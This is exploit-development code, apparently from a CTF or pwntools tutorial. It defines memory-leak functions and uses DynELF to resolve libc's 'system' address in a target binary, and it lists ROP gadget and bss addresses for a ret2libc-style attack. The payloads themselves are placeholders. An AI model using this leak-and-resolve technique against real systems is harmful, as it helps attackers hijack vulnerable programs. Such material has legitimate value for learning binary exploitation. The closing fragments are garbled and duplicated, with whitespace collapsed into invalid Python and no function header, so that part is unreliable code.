# Assume a process or remote connection p = process('./pwnme')
# Declare a function that takes a single address and leaks at least one byte
# at that address (DynELF only needs one byte back per call).
def leak(address):
    """Return the bytes read at ``address`` from the tube ``p``.

    Four bytes are requested; whatever comes back (possibly empty) is
    logged in hex at debug level and returned unchanged.
    """
    leaked = p.read(address, 4)  # alternative: leaked = p.recv(4)
    shown = (leaked or '').encode('hex')
    log.debug("%#x => %s" % (address, shown))
    return leaked
# For the sake of this example, assume we already hold these pointers: one
# into the target binary (main) and two into libc (its base and system).
# The values are illustrative, not addresses of a real process.
main, libc, system = 0xfeedf4ce, 0xdeadb000, 0xdeadbeef
# With our leaker and a pointer into the target binary we can resolve the
# address of anything.  A copy of the target binary is not required for this.
d = DynELF(leak, main)
assert libc == d.lookup(None, 'libc')
assert system == d.lookup('system', 'libc')
# If a copy of the target binary is available, passing it lets DynELF speed up
# some of the steps.  The resolved values are the same as without it.
d = DynELF(leak, main, elf=ELF('./pwnme'))
assert libc == d.lookup(None, 'libc')
assert system == d.lookup('system', 'libc')
# Alternately, symbols inside another library can be resolved directly, given
# any pointer into that library (here: libc base plus an arbitrary offset).
d = DynELF(leak, libc + 0x1234)
# assert: execution continues when the condition is true and an
# AssertionError is raised when it is false.
assert system == d.lookup('system')
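def leak(address):
    """Leak up to four bytes at ``address`` from the running target ``p``.

    ``xxx`` is a placeholder for the address-specific payload and for the
    marker line that precedes the leaked output.  After sending the payload
    and draining output up to the marker, bytes are collected one at a time
    until a newline is followed by a receive timeout.  The trailing newline
    is replaced by a NUL byte and the result is cut to four bytes.

    Returns the collected bytes (possibly empty).
    """
    data = ''
    payload = xxx
    p.send(payload)
    # Drain all output produced before puts; the program then reaches its
    # return and the payload starts executing.
    print p.recvuntil('xxx\n')
    up = ""
    # Collect the leaked bytes one character at a time.
    while True:
        # Nothing else is printed after the terminating newline, so a receive
        # with a 1-second timeout (which returns "" when nothing arrives) tells
        # that final newline apart from a 0x0A byte inside the leaked data.
        c = p.recv(numb=1, timeout=1)
        if up == '\n' and c == "":
            # Previous byte was the newline and nothing more arrived: drop the
            # newline that puts appended and terminate the data.
            data = data[:-1]
            data += "\x00"
            break
        data += c
        up = c
    # NOTE(review): the loop only ends on a timeout that follows a newline;
    # confirm the target always terminates the leaked line with '\n'.
    data = data[:4]  # keep only the requested width
    log.info("%#x => %s" % (address, (data or '').encode('hex')))
    return data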
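def leak(address):
    """Leak up to four bytes at ``address`` from the running target ``p``.

    Variant of the timeout-based leaker that instead stops when a newline is
    followed by a known marker character.  ``xxx`` is a placeholder for the
    address-specific payload and for the marker line that precedes the leaked
    output.  The trailing newline is replaced by a NUL byte and the result is
    cut to four bytes.

    Returns the collected bytes (possibly empty).
    """
    data = ""
    payload = xxx
    p.send(payload)
    print p.recvuntil("xxx\n")  # drain all output produced before puts
    up = ""
    while True:
        c = p.recv(1)
        # The end of the leak is recognised by a newline followed by the first
        # character of the next string the program prints; 'x' stands for that
        # character and must be matched to the target's real output.
        if up == '\n' and c == "x":
            data = data[:-1]  # drop the newline that puts appended
            data += "\x00"
            break
        data += c
        up = c
    data = data[:4]  # keep only the requested width
    log.info("%#x => %s" % (address, (data or '').encode('hex')))
    return data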
p.recvuntil("bye~\n") whileTrue: c = p.recv(numb=1,timeout=0.1) count += 1 if up == '\n'and c == '': data = data[:-1] data += "\x00" break else: data += c up = c data = data[:4] log.info("%#x => %s" % (addr, (data or'').encode('hex'))) return data
# Fixed addresses taken from the (non-PIE) target binary.
main, pop_rdi = 0x04006B8, 0x0400763  # pop_rdi: "pop rdi; ret" gadget
p.recvuntil("bye~\n") whileTrue: c = p.recv(numb=1,timeout=0.1) count += 1 if up == '\n'and c == '': data = data[:-1] data += "\x00" break else: data += c up = c data = data[:4] log.info("%#x => %s" % (addr, (data or'').encode('hex'))) return data
# Fixed addresses taken from the (non-PIE) target binary.
start, main = 0x00400550, 0x04006B8
pop_rdi = 0x0400763  # "pop rdi; ret" gadget
bss_addr = 0x0601060